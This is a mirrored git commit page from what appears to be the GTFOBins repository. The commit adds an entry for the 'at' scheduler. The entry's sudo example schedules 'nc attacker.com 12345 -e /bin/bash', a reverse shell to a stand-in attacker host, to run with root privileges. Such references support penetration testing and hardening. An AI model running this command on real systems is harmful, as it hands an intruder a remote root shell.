mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
added at
This commit is contained in:
parent
bb4050810e
commit
e241cd3aa7
8
_gtfobins/at.md
Normal file
8
_gtfobins/at.md
Normal file
@ -0,0 +1,8 @@
|
|||||||
|
---
|
||||||
|
description: |
|
||||||
|
at is a command-line utility that allows you to schedule commands to be executed at a particular time.
|
||||||
|
functions:
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
echo "nc attacker.com 12345 -e /bin/bash" | sudo at now +1 minutes
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user